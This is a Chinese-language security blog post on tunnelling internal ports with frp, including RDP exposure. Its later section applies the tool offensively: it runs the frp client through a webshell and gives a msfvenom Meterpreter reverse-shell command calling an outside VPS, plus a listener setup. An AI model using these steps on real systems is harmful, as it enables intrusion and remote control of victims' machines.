<!DOCTYPE html>
<html lang="en">
<head>

    <!--[if lt IE 9]>
        <style>body {display: none; background: none !important} </style>
        <meta http-equiv="Refresh" Content="0; url=//outdatedbrowser.com/" />
    <![endif]-->

<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<meta name="format-detection" content="telephone=no" />
<meta name="author" content="Tu3k" />
<link rel="stylesheet" href="/css/tags.css" media="all">


<meta name="description" content="Frp简介这是一款基于服务端和客户端之间建立通信后，将客户端的某个端口转发到服务端访问">
<meta property="og:type" content="article">
<meta property="og:title" content="Frp内网转发&#x2F;穿透使用">
<meta property="og:url" content="https://www.tu3k.cn/2020/12/28/frp/index.html">
<meta property="og:site_name">
<meta property="og:description" content="Frp简介这是一款基于服务端和客户端之间建立通信后，将客户端的某个端口转发到服务端访问">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://www.tu3k.cn/images/frp/1.png">
<meta property="og:image" content="https://www.tu3k.cn/images/frp/2.png">
<meta property="og:image" content="https://www.tu3k.cn/images/frp/3.png">
<meta property="og:image" content="https://www.tu3k.cn/images/frp/4.png">
<meta property="og:image" content="https://www.tu3k.cn/images/frp/5.png">
<meta property="og:image" content="https://www.tu3k.cn/images/frp/6.png">
<meta property="og:image" content="https://www.tu3k.cn/images/frp/7.png">
<meta property="og:image" content="https://www.tu3k.cn/images/frp/8.png">
<meta property="og:image" content="https://www.tu3k.cn/images/frp/9.png">
<meta property="og:image" content="https://www.tu3k.cn/images/frp/10.png">
<meta property="og:image" content="https://www.tu3k.cn/images/frp/11.png">
<meta property="og:image" content="https://www.tu3k.cn/images/frp/12.png">
<meta property="article:published_time" content="2020-12-28T08:45:11.000Z">
<meta property="article:modified_time" content="2021-01-05T09:29:13.789Z">
<meta property="article:tag" content="Frp内网转发">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://www.tu3k.cn/images/frp/1.png">


    <link rel="icon" href="/images/favicon.ico">
  




    <link rel="shortcut icon" href="/favicon.png">



    <link href="//cdn.bootcss.com/animate.css/3.5.1/animate.min.css" rel="stylesheet">



    <link href="//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.css" rel="stylesheet">



    <script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
    <link href="//cdn.bootcss.com/pace/1.0.2/themes/blue/pace-theme-minimal.css" rel="stylesheet">



<link rel="stylesheet" href="/css/style.css">




<link href="//cdn.bootcss.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet">


<title>Frp内网转发/穿透使用 | Tu3k's Blog</title>

<script src="//cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>
<script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>

<script>
    var yiliaConfig = {
        fancybox: true,
        animate: true,
        isHome: false,
        isPost: true,
        isArchive: false,
        isTag: false,
        isCategory: false,
        fancybox_js: "//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.js",
        scrollreveal: "//cdn.bootcss.com/scrollReveal.js/3.1.4/scrollreveal.min.js",
        search: true
    }
</script>


    <script> yiliaConfig.jquery_ui = [false]; </script>



    <script> yiliaConfig.rootUrl = "\/";</script>





    <script>
        var _hmt = _hmt || [];
        (function() {
            var hm = document.createElement("script");
            hm.src = "//hm.baidu.com/hm.js?691d4c8cb59ad2a5d8c46f1ce6268b57";
            var s = document.getElementsByTagName("script")[0]; 
            s.parentNode.insertBefore(hm, s);
        })();
    </script>


<meta name="generator" content="Hexo 5.3.0"></head>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            <img src="/images/qq.jpg" class="animated zoomIn">
        </a>
        <hgroup>
          <h1 class="header-author"><a href="/"></a></h1>
        </hgroup>

        

        
            <form id="search-form">
            <input type="text" id="local-search-input" name="q" placeholder="search..." class="search form-control" autocomplete="off" autocorrect="off" searchonload="false" />
            <i class="fa fa-times" onclick="resetSearch()"></i>
            </form>
            <div id="local-search-result"></div>
            <p class='no-result'>No results found <i class='fa fa-spinner fa-pulse'></i></p>
        


        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                    
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>Menu</li>
                        <li>Tags</li>
                        
                        <li>Friends</li>
                        
                        
                        <li>About Me</li>
                        
                    </ul>
                </div>
            </div>
        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/">首页</a></li>
                        
                            <li><a href="/archives/">所有文章</a></li>
                        
                            <li><a href="/tags/">标签云</a></li>
                        
                            <li><a href="/about/">关于我</a></li>
                        
                            <li><a href="/playlist/">那忆年</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa 微信" href="#####?rnm####?rnm####?xswl####1119866279" title="微信"></a>
                            
                        </ul>
                    </nav>
                </section>
                
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/CobaltStrike/" rel="tag">CobaltStrike</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Frp%E5%86%85%E7%BD%91%E8%BD%AC%E5%8F%91/" rel="tag">Frp内网转发</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Python%E5%87%BD%E6%95%B0/" rel="tag">Python函数</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Python%E7%AC%94%E8%AE%B0/" rel="tag">Python笔记</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Redis/" rel="tag">Redis</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Ueditor%E6%BC%8F%E6%B4%9E/" rel="tag">Ueditor漏洞</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/flash%E9%92%93%E9%B1%BC/" rel="tag">flash钓鱼</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/kerberos/" rel="tag">kerberos</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%86%85%E7%BD%91%E6%BC%AB%E6%B8%B8/" rel="tag">内网漫游</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%87%BA%E7%89%88%E7%A4%BE%E6%BC%8F%E6%B4%9E/" rel="tag">出版社漏洞</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%95%99%E8%82%B2%E7%B3%BB%E7%BB%9F-%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/" rel="tag">教育系统 漏洞挖掘</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%98%9F%E5%A4%967i24%E6%8F%90%E6%9D%83/" rel="tag">星外7i24提权</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E7%BB%B4%E6%8C%81%E6%9D%83%E9%99%90/" rel="tag">维持权限</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E9%AA%91%E5%A3%ABCMS-Getshell/" rel="tag">骑士CMS Getshell</a></li></ul>
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a class="main-nav-link switch-friends-link" href="https://www.tu3k.cn">吃可爱存活的博客</a>
                    
                    </div>
                </section>
                

                
                
                <section class="switch-part switch-part4">
                
                    <div id="js-aboutme">博客就是记录平常学习的笔记和操作，以及最新漏洞的复现，写成文章增加记忆力和动手能力[小博主真的菜]。生活很苦，但你要努力，加油，追梦人。</div>
                </section>
                
            </div>
        </div>
    </header>                
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="回到主页"></a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                <img src="/images/qq.jpg" class="animated zoomIn">
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="回到主页"></a></h1>
            </hgroup>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/">首页</a></li>
                
                    <li><a href="/archives/">所有文章</a></li>
                
                    <li><a href="/tags/">标签云</a></li>
                
                    <li><a href="/about/">关于我</a></li>
                
                    <li><a href="/playlist/">那忆年</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa 微信" target="_blank" href="#####?rnm####?rnm####?xswl####1119866279" title="微信"></a>
                            
                        </ul>
            </nav>
        </header>                
    </div>
    <link class="menu-list" tags="Tags" friends="Friends" about="About Me"/>
</nav>
      <div class="body-wrap"><article id="post-frp" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2020/12/28/frp/" class="article-date">
      <time datetime="2020-12-28T08:45:11.000Z" itemprop="datePublished">2020-12-28</time>
</a>


    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      Frp内网转发/穿透使用
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        

        
    <div class="article-tag tagcloud">
        <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Frp%E5%86%85%E7%BD%91%E8%BD%AC%E5%8F%91/" rel="tag">Frp内网转发</a></li></ul>
    </div>

        <div class="clearfix"></div>
      </div>
      
    
<div class="article-entry" itemprop="articleBody">
    
        
        <h2 id="Frp简介"><a href="#Frp简介" class="headerlink" title="Frp简介"></a>Frp简介</h2><p><strong>这是一款基于服务端和客户端之间建立通信后，将客户端的某个端口转发到服务端访问</strong></p>
<a id="more"></a>
<h2 id="使用教程"><a href="#使用教程" class="headerlink" title="使用教程"></a>使用教程</h2><p>下载地址：<code>https://github.com/fatedier/frp/releases</code><br>服务端：linux_amd64<br>客户端：windows_amd64<br><img src="https://www.tu3k.cn/images/frp/1.png" alt="frp_github" title="frp_github"><br>原理：自认为好理解。用一个端口(<code>bind_port = 5000</code>)将服务端和客户端产生通信，设置服务(frps.ini)和客户端(frpc.ini)相关参数，启动程序(frps.exe和frpc.exe)并指定程序文件(frps.ini和frpc.ini)，转发成功。<br><img src="https://www.tu3k.cn/images/frp/2.png" alt="frp_github1" title="frp_github1"><br>windows和linux都有这俩块文件，所以两个系统都可以转发内网到外网。<br>服务器IP：<code>kali——192.168.235.130</code><br>客户端IP：<code>Win10—192.168.1.155</code></p>
<h3 id="0x01-WEB端的转发"><a href="#0x01-WEB端的转发" class="headerlink" title="0x01 WEB端的转发"></a>0x01 WEB端的转发</h3><p>服务端：<br>首先解压文件：<code>tar zxvf frp_0.34.3_linux_amd64.tar.gz</code><br>重命名文件夹：<code>mv frp_0.34.3_linux_amd64/ frp</code><br>使用root权限进行修改：<code>sudo gedit frps.ini</code><br><img src="https://www.tu3k.cn/images/frp/3.png" alt="frp_github2" title="frp_github2"><br>9999该端口就是以后访问web服务需要用到的端口  <code>192.168.235.130:9999</code>，访问这个链接就会链接到我们的内网地址，内网地址设置在后面有说。<br>保存退出，启动服务<br><code>./frps -c ./frps.ini</code><br><img src="https://www.tu3k.cn/images/frp/4.png" alt="frp_github3" title="frp_github3"><br>服务端配置完成。<br>客户端：<br>打开frpc.ini<br><img src="https://www.tu3k.cn/images/frp/5.png" alt="frp_github4" title="frp_github4"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">[common]</span><br><span class="line">server_addr &#x3D; 192.168.235.130         &#x2F;&#x2F;服务端的地址</span><br><span class="line">server_port &#x3D; 5000                与服务端建立通信的地址  也就是最上面提到的5000</span><br><span class="line">[服务]</span><br><span class="line">type &#x3D; http&#x2F;https                &#x2F;&#x2F;如果是https就写https    注意不要写错 不然接受转发不了</span><br><span class="line">local_ip &#x3D; 内网ip</span><br><span class="line">local_port &#x3D; 内网web服务端口或者其他服务端口</span><br><span class="line">custom_domains &#x3D; vps域名或IP</span><br></pre></td></tr></table></figure>
<p>例：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">[web]</span><br><span class="line">type &#x3D; http</span><br><span class="line">local_ip &#x3D; 192.168.1.155</span><br><span class="line">local_port &#x3D; 8080</span><br><span class="line">custom_domain &#x3D; 192.168.235.130</span><br></pre></td></tr></table></figure>
<p>保存退出，打开cmd切到frp目录启动<br><code>frpc.exe -c frpc.ini</code><br><img src="https://www.tu3k.cn/images/frp/6.png" alt="frp_github5" title="frp_github5"><br>客户端设置完成。<br>此时访问vps ip：<code>http://192.168.235.130:9999/</code><br><img src="https://www.tu3k.cn/images/frp/7.png" alt="frp_github6" title="frp_github6"><br>就访问到了我们本机phpinfo。</p>
<h3 id="0x02-3389端口转发"><a href="#0x02-3389端口转发" class="headerlink" title="0x02 3389端口转发"></a>0x02 3389端口转发</h3><p>只需在frpc.ini中添加</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">[rdp]</span><br><span class="line">type &#x3D; tcp</span><br><span class="line">local_ip &#x3D; 192.168.1.155</span><br><span class="line">local_port &#x3D; 3389</span><br><span class="line">remote_port &#x3D; 2030</span><br></pre></td></tr></table></figure>
<p><img src="https://www.tu3k.cn/images/frp/8.png" alt="rdp" title="rdp"><br>3389是内网的远程端口，必须要开着才可以转发，2030是转发到外网的2030端口 进行连接，这里是转发到了我kali的2030，所以直接连接  kali-ip:2030  即可登录我的windows主机。<br><img src="https://www.tu3k.cn/images/frp/9.png" alt="rdp" title="rdp"></p>
<h3 id="0x03-应用场景"><a href="#0x03-应用场景" class="headerlink" title="0x03 应用场景"></a>0x03 应用场景</h3><h4 id="0x03-①"><a href="#0x03-①" class="headerlink" title="0x03 ①"></a>0x03 ①</h4><p>webshell中可以先配置好ini文件然后上传客户端脚本到可执行目录<br>执行frpc.exe -c frpc.ini<br>有时候远程端口不是3389，需要手动去寻找一下远程端口是多少，再修改运行<br>接着我们本机连接vps-ip:转发的端口号  即可</p>
<h4 id="0x03-②"><a href="#0x03-②" class="headerlink" title="0x03 ②"></a>0x03 ②</h4><p>将msf转发出网，接受反弹的shell<br>首先将服务端文件传到vps上面，配置好通信端口和转发端口 开始运行<br>注意：因为msf监听的payload是tcp 所以这里也要设置tcp<br><img src="https://www.tu3k.cn/images/frp/10.png" alt="msf" title="msf"><br>kali内也设置好类型为tcp<br><img src="https://www.tu3k.cn/images/frp/11.png" alt="msf1" title="msf1"><br>设置完毕启动后，在进行tcp访问vps的2222端口时，会转发到kali的4466端口上，建立shell连接。<br>首先创建payload<br><code>msfvenom -p windows/meterpreter/reverse_tcp LHOST=154.XXX.XXX.135 LPORT=2222 -f exe &gt; shell.exe</code><br>将payload传到目标机器，kali内msf设置监听4466端口</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">use exploit&#x2F;multi&#x2F;handler</span><br><span class="line">set payload windows&#x2F;meterpreter&#x2F;reverse_tcp</span><br><span class="line">set LHOST 192.168.235.130</span><br><span class="line">set LPORT 4466</span><br><span class="line">run</span><br></pre></td></tr></table></figure>
<p>目标机器执行payload，tcp先会去连接vps的端口，然后vps端口转发到我们kali的4466.形成反弹shell<br><img src="https://www.tu3k.cn/images/frp/12.png" alt="msf1" title="msf1"></p>

    
</div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>Title:</span><a href="/2020/12/28/frp/">Frp内网转发/穿透使用</a></p>
        <p><span>Author:</span><a href="/" title="Back to Homepage"></a></p>
        <p><span>Created:</span>2020-12-28, 16:45:11</p>
        <p><span>Updated:</span>2021-01-05, 17:29:13</p>
        <p>
            <span>Full URL:</span><a class="post-url" href="/2020/12/28/frp/" title="Frp内网转发/穿透使用">https://www.tu3k.cn/2020/12/28/frp/</a>
            <span class="copy-path" data-clipboard-text="From https://www.tu3k.cn/2020/12/28/frp/　　By " title="Copy Article&#39;s Link &amp; Author"><i class="fa fa-clipboard"></i></span>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>License:</span><i class="fa fa-creative-commons"></i> <a rel="license noopener" target="_blank" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" title="CC BY-NC-SA 4.0 International" target = "_blank">"CC BY-NC-SA 4.0"</a> Keep Link &amp; Author if Distribute.
        </p>
    </div>



    <nav id="article-nav">
        
            <div id="article-nav-newer" class="article-nav-title">
                <a href="/2020/12/29/kerberos-study/">
                    个人理解kerberos的作用和运行流程
                </a>
            </div>
        
        
            <div id="article-nav-older" class="article-nav-title">
                <a href="/2020/12/28/edu_bug/">
                    某教育系统的基础漏洞检测
                </a>
            </div>
        
    </nav>

  
</article>

    <div id="toc" class="toc-article">
        <strong class="toc-title">Contents</strong>
        
            <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Frp%E7%AE%80%E4%BB%8B"><span class="toc-number">1.</span> <span class="toc-text">Frp简介</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8%E6%95%99%E7%A8%8B"><span class="toc-number">2.</span> <span class="toc-text">使用教程</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#0x01-WEB%E7%AB%AF%E7%9A%84%E8%BD%AC%E5%8F%91"><span class="toc-number">2.1.</span> <span class="toc-text">0x01 WEB端的转发</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x02-3389%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91"><span class="toc-number">2.2.</span> <span class="toc-text">0x02 3389端口转发</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x03-%E5%BA%94%E7%94%A8%E5%9C%BA%E6%99%AF"><span class="toc-number">2.3.</span> <span class="toc-text">0x03 应用场景</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#0x03-%E2%91%A0"><span class="toc-number">2.3.1.</span> <span class="toc-text">0x03 ①</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x03-%E2%91%A1"><span class="toc-number">2.3.2.</span> <span class="toc-text">0x03 ②</span></a></li></ol></li></ol></li></ol>
        
    </div>
    <style>
        .left-col .switch-btn,
        .left-col .switch-area {
            display: none;
        }
        .toc-level-3 i,
        .toc-level-3 ol {
            display: none !important;
        }
    </style>

    <input type="button" id="tocButton" value="Hide"  title="Show or Hide Table of Contents">

    <script>
        yiliaConfig.toc = ["Hide", "Show", !!"false"];
    </script>



    
<div class="share">
    
        <div class="bdsharebuttonbox">
            <a href="#" class="fa fa-twitter bds_twi" data-cmd="twi" title="分享到推特"></a>
            <a href="#" class="fa fa-weibo bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a>
            <a href="#" class="fa fa-qq bds_sqq" data-cmd="sqq" title="分享给 QQ 好友"></a>
            <a href="#" class="fa fa-files-o bds_copy" data-cmd="copy" title="复制网址"></a>
            <a href="#" class="fa fa fa-envelope-o bds_mail" data-cmd="mail" title="通过邮件分享"></a>
            <a href="#" class="fa fa-weixin bds_weixin" data-cmd="weixin" title="生成文章二维码"></a>
            <a href="#" class="fa fa-share-alt bds_more" data-cmd="more"></i></a>
        </div>
        <script>
            window._bd_share_config={
                "common":{"bdSnsKey":{},"bdText":"Frp内网转发/穿透使用　| 　","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"24"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];
        </script>
    

    
</div>







    




    <div class="scroll" id="post-nav-button">
        
            <a href="/2020/12/29/kerberos-study/" title="Pre: 个人理解kerberos的作用和运行流程">
                <i class="fa fa-angle-left"></i>
            </a>
        

        <a title="Mini Archives"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>

        
            <a href="/2020/12/28/edu_bug/" title="Next: 某教育系统的基础漏洞检测">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>

    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2021/01/17/Python-def/">Python字符串内建函数</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/14/Python-one/">Python笔记1——基本语法</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/13/flash-diaoyu/">Flash制作钓鱼远控上线CS</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/11/chubanshe-bugs/">某出版社漏洞大礼包</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/10/sc-powershell-serivces-yincang/">SC实现隐藏Windows服务维持权限</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/09/74cms-tempelate-log-include-shell/">骑士CMS 模板文件日志包含Getshell</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/08/cs-chm-online/">CobaltStrike实现Chm后门</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/07/redis/">Redis未授权访问</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/04/7i24tiquan/">记录一次7i24星外虚拟主机提权</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/03/yinduneiwang/">记一次印度网站getshell到内网漫游</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/12/29/kerberos-study/">个人理解kerberos的作用和运行流程</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/12/28/frp/">Frp内网转发/穿透使用</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/12/28/edu_bug/">某教育系统的基础漏洞检测</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/12/27/ueditor_net_upload/">Ueditor.NET版本任意文件上传漏洞</a></li></ul>




    <script>
        
    </script>
</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                <i class="fa fa-copyright"></i> 
                2020-2021 @Baicai
            </div>
            <div class="footer-right">
                <a href="https://www.tu3k.cn" target="_blank" title="A fast, simple &amp; powerful blog framework">By Tu3k</a>       ||	This WebSite No Smoking</a> <i class="fa fa-heart animated infinite pulse"></i>
            </div>
        </div>
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style='display:none'>
                        <span id="site-visit" title="Site Visitors"><i class="fa fa-user" aria-hidden="true"></i><span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>| </span>
                
                
                    <span id="busuanzi_container_page_pv" style='display:none'>
                        <span id="page-visit"  title="Page Hits"><i class="fa fa-eye animated infinite pulse" aria-hidden="true"></i><span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
<div id="musicMouseDrag" style="position:fixed; z-index: 9999; bottom: 0; right: 0;">
    
</footer>
    </div>
    
<script data-main="/js/main.js" src="//cdn.bootcss.com/require.js/2.2.0/require.min.js"></script>

    <script>
        $(document).ready(function() {
            var iPad = window.navigator.userAgent.indexOf('iPad');
            if (iPad > -1 || $(".left-col").css("display") === "none") {
                var bgColorList = ["#9db3f4", "#414141", "#e5a859", "#f5dfc6", "#c084a0", "#847e72", "#cd8390", "#996731"];
                var bgColor = Math.ceil(Math.random() * (bgColorList.length - 1));
                $("body").css({"background-color": bgColorList[bgColor], "background-size": "cover"});
            }
            else {
                var backgroundnum = 1;
                var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
                $("body").css({"background": backgroundimg, "background-attachment": "fixed", "background-size": "cover"});
            }
        })
    </script>





<div class="scroll" id="scroll">
    <a href="#" title="Back to Top"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments" onclick="load$hide();" title="Comments"><i class="fa fa-comments-o"></i></a>
    <a href="#footer" title="Go to Bottom"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    // Open in New Window
    
        var oOpenInNew = {
            
             title: "a.article-title, .article-more-link a", 
            
            
            
            
             archives: ".archive-article-title", 
             miniArchives: "a.post-list-link", 
            
             friends: "#js-friends a", 
             socail: ".social a" 
        }
        for (var x in oOpenInNew) {
            $(oOpenInNew[x]).attr("target", "_blank");
        }
    
</script>

    <script>
        var originTitle = document.title;
        var titleTime;
        document.addEventListener("visibilitychange", function() {
            if (document.hidden) {
                document.title = "(つェ⊂) 等主人回来啊~ " + originTitle;
                clearTimeout(titleTime);
            }
            else {
                document.title = "(*´∇｀*) 被你发现啦~ " + originTitle;
                titleTime = setTimeout(function() {
                    document.title = originTitle;
                }, 2000);
            }
        })
    </script>

<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>
  </div>
</body>
</html>